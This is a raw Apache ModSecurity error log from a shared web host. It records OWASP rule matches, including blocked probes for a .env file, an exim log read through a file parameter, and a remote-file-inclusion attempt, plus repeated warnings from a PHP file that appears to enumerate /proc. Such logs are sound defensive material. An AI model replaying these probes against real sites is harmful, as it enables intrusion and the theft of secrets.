[Tue May 12 00:13:24.396069 2026] [security2:error] [pid 1605480:tid 1605525] [client 43.135.144.81:56326] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-content/uploads/2018/08/les-youngtimers-1980a2000-le"] [unique_id "agJUhB2Cvzd_nyNfUm8kEwAAAQM"]
[Tue May 12 00:13:25.584619 2026] [security2:error] [pid 1588898:tid 1588915] [client 43.157.168.43:60882] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "labaujue.com"] [uri "/"] [unique_id "agJUhaFW67LJTsgN3jQxeQAAABA"]
[Tue May 12 00:13:31.280407 2026] [security2:error] [pid 1606352:tid 1606440] [client 43.157.168.43:46140] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/"] [unique_id "agJUi3o_DFxNSZVmaX3zbwAAANU"], referer: http://labaujue.com
[Tue May 12 00:14:15.393626 2026] [security2:error] [pid 1588898:tid 1588915] [client 43.157.191.20:58538] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/downloads/APOE-RESULTAS-2018-2019.pdf"] [unique_id "agJUt6FW67LJTsgN3jQx7gAAABA"]
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704684/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704684/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704684/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704684/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704684/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704684/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:14:41.273650 2026] [security2:error] [pid 1605480:tid 1605545] [client 43.153.135.208:45042] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agJU0R2Cvzd_nyNfUm8kbgAAARc"], referer: http://tchatbooster.fr
[Tue May 12 00:14:42.691093 2026] [security2:error] [pid 1590352:tid 1590416] [client 43.164.190.124:57882] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/mobil-home-tahiti/"] [unique_id "agJU0q1q0G_aXAqWauQfygAAAJg"]
403 (Forbidden): 403 Forbidden
Executing in an invalid environment for the supplied user at /usr/local/cpanel/Cpanel/CGI/NoForm.pm line 157.
403 (Forbidden): 403 Forbidden
Executing in an invalid environment for the supplied user at /usr/local/cpanel/Cpanel/CGI/NoForm.pm line 157.
403 (Forbidden): 403 Forbidden
Executing in an invalid environment for the supplied user at /usr/local/cpanel/Cpanel/CGI/NoForm.pm line 157.
[Tue May 12 00:14:49.163567 2026] [security2:error] [pid 1605480:tid 1605531] [client 43.164.190.124:38452] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/lodge-tahiti/"] [unique_id "agJU2R2Cvzd_nyNfUm8kdQAAAQk"], referer: https://rentparadise.fr/accommodation/mobil-home-tahiti/
403 (Forbidden): 403 Forbidden
Executing in an invalid environment for the supplied user at /usr/local/cpanel/Cpanel/CGI/NoForm.pm line 157.
403 (Forbidden): 403 Forbidden
Executing in an invalid environment for the supplied user at /usr/local/cpanel/Cpanel/CGI/NoForm.pm line 157.
403 (Forbidden): 403 Forbidden
Executing in an invalid environment for the supplied user at /usr/local/cpanel/Cpanel/CGI/NoForm.pm line 157.
403 (Forbidden): 403 Forbidden
Executing in an invalid environment for the supplied user at /usr/local/cpanel/Cpanel/CGI/NoForm.pm line 157.
[Tue May 12 00:14:55.744689 2026] [security2:error] [pid 1601130:tid 1601153] [client 43.157.95.131:53796] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/feed/"] [unique_id "agJU33EgAO_835W6c1m7oAAAAEM"]
[Tue May 12 00:15:25.124634 2026] [authz_core:error] [pid 1605480:tid 1605534] [client 195.3.220.7:50290] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-admin/includes/error_log
[Tue May 12 00:15:29.608251 2026] [security2:error] [pid 1606352:tid 1606428] [client 43.135.148.92:42506] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/wp-content/themes/enfold/framework/"] [unique_id "agJVAXo_DFxNSZVmaX30TgAAAMk"]
[Tue May 12 00:15:29.624049 2026] [authz_core:error] [pid 1606352:tid 1606428] [client 43.135.148.92:42506] AH01630: client denied by server configuration: /home/castigli/public_html/wp-content/themes/enfold/framework/error_log
PHP Warning:  filesize(): stat failed for /proc/241/task/241/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/241/task/241/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/241/task/241/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/241/task/241/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/241/task/241/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/241/task/241/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:15:44.894499 2026] [authz_core:error] [pid 1605480:tid 1605525] [client 216.73.216.110:45594] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/coursecopy/error_log
[Tue May 12 00:16:27.239500 2026] [security2:error] [pid 1601130:tid 1601153] [client 43.135.148.92:32888] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/category/flb/"] [unique_id "agJVO3EgAO_835W6c1m8YAAAAEM"]
[Tue May 12 00:16:57.968346 2026] [security2:error] [pid 1590352:tid 1590401] [client 216.73.216.110:52250] ModSecurity: Warning. Matched phrase "var/log/exim_mainlog" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/exim_mainlog found within ARGS:filesrc: /var/log/exim_mainlog-20260510.gz"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJVWa1q0G_aXAqWauQgwgAAAIk"]
[Tue May 12 00:16:57.969451 2026] [security2:error] [pid 1590352:tid 1590401] [client 216.73.216.110:52250] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJVWa1q0G_aXAqWauQgwgAAAIk"]
[Tue May 12 00:16:58.133591 2026] [security2:error] [pid 1590352:tid 1590401] [client 216.73.216.110:52250] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJVWa1q0G_aXAqWauQgwgAAAIk"]
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790181/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790181/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790181/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790181/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790181/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790181/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:17:24.033787 2026] [security2:error] [pid 1606352:tid 1606436] [client 43.135.182.43:39326] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/informatique/langage/php/"] [unique_id "agJVdHo_DFxNSZVmaX31LwAAANE"]
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704664/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704664/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704664/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704664/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704664/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704664/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/229356/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/229356/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/229356/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/229356/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/229356/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/229356/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:18:56.190895 2026] [security2:error] [pid 1601130:tid 1601169] [client 119.28.177.175:59512] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agJV0HEgAO_835W6c1m9nAAAAFM"], referer: http://www.tchatbooster.fr
[Tue May 12 00:18:59.451060 2026] [security2:error] [pid 1630927:tid 1630949] [client 85.208.96.197:47670] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://159.223.55.38 found within ARGS:url: http://159.223.55.38/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJV02iGYYhUwDaJINm0QgAAAVM"]
[Tue May 12 00:18:59.452083 2026] [security2:error] [pid 1630927:tid 1630949] [client 85.208.96.197:47670] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJV02iGYYhUwDaJINm0QgAAAVM"]
[Tue May 12 00:18:59.452465 2026] [security2:error] [pid 1630927:tid 1630949] [client 85.208.96.197:47670] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJV02iGYYhUwDaJINm0QgAAAVM"]
[Tue May 12 00:19:02.491150 2026] [security2:error] [pid 1630927:tid 1630932] [client 170.106.152.218:33452] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2019/11/Infiniement-tomber-extrait-1.mp3"] [unique_id "agJV1miGYYhUwDaJINm0VAAAAUI"]
[Tue May 12 00:19:07.271383 2026] [security2:error] [pid 1605480:tid 1605522] [client 129.226.93.214:43448] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJV2x2Cvzd_nyNfUm8l2gAAAQA"]
[Tue May 12 00:20:03.297835 2026] [security2:error] [pid 1630927:tid 1630943] [client 43.160.241.129:52162] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/emplois-daujourdhui-et-de-demain/economie-du-territoitre/"] [unique_id "agJWE2iGYYhUwDaJINm0ugAAAU0"]
[Tue May 12 00:20:07.820029 2026] [security2:error] [pid 1588898:tid 1588914] [client 43.160.241.129:58722] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/wp-content/uploads/2023/01/economie-du-territoitre.png"] [unique_id "agJWF6FW67LJTsgN3jQ0CwAAAA8"], referer: https://pole-de-mobilite-regional.com/vous-etes-un-salarie/emplois-daujourdhui-et-de-demain/economie-du-territoitre/
[Tue May 12 00:20:12.890431 2026] [security2:error] [pid 1630927:tid 1630931] [client 43.165.126.130:34360] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJWHGiGYYhUwDaJINm0yAAAAUE"]
[Tue May 12 00:20:33.454872 2026] [security2:error] [pid 1590352:tid 1590397] [client 43.163.4.179:57960] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.la-grande-fabrique.com"] [uri "/emplacements-techniques-sonores/regie-20001/"] [unique_id "agJWMa1q0G_aXAqWauQifgAAAIU"]
[Tue May 12 00:20:48.224731 2026] [security2:error] [pid 1601130:tid 1601174] [client 176.65.139.232:49478] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/app/.env"] [unique_id "agJWQHEgAO_835W6c1m-kwAAAFg"]
[Tue May 12 00:20:48.224980 2026] [security2:error] [pid 1601130:tid 1601174] [client 176.65.139.232:49478] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/app/.env"] [unique_id "agJWQHEgAO_835W6c1m-kwAAAFg"]
[Tue May 12 00:20:50.330636 2026] [security2:error] [pid 1601130:tid 1601174] [client 176.65.139.232:49478] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agJWQHEgAO_835W6c1m-kwAAAFg"]
PHP Warning:  filesize(): stat failed for /proc/207/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/207/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/207/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/207/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/207/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/207/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:22:10.875503 2026] [ssl:error] [pid 1590352:tid 1590393] (EAI 2)Name or service not known: [client 43.156.232.134:49140] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:22:10.875553 2026] [ssl:error] [pid 1590352:tid 1590393] AH01941: stapling_renew_response: responder error
